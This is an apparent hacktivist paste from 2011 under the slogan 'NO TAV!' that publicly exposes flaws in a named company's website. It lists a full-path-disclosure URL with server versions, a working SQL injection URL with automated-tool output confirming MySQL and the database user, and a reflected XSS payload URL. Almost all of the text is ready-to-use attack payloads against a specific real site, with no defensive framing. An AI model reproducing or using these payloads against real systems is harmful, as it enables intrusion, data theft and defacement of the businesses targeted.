a guest
Jul 4th, 2011
NO TAV!

With Sole and Baleno in our hearts


--- Full Path Disclosure

http://www.ltf-sas.com/index.php?lg_visite=aaa

Apache/2.0.54 (Win32) PHP/4.4.0 Server at www.ltf-sas.com Port 80

--- SQL Injection

http://www.ltf-sas.com/pages/articles.php?art_id=-1%20union%20select%201,2,3,4,5,version%28%29,7,COUNT%28*%29,9,10,11,12,13,14%20from%20ltf.articles

[19:17:55] [INFO] testing MySQL
[19:17:56] [INFO] confirming MySQL
[19:18:00] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 4.4.0, Apache 2.0.54
back-end DBMS: MySQL < 5.0.0
[19:18:00] [INFO] fetching current user
[19:18:00] [INFO] retrieved: ltf@localhost
current user: 'ltf@localhost'

--- XSS

http://www.ltf-sas.com/pages/search.php?recherche=%3E%3Cscript%3Ealert%28%27NO+TAV%27%29%3C%2Fscript%3E&imageField.x=0&imageField.y=0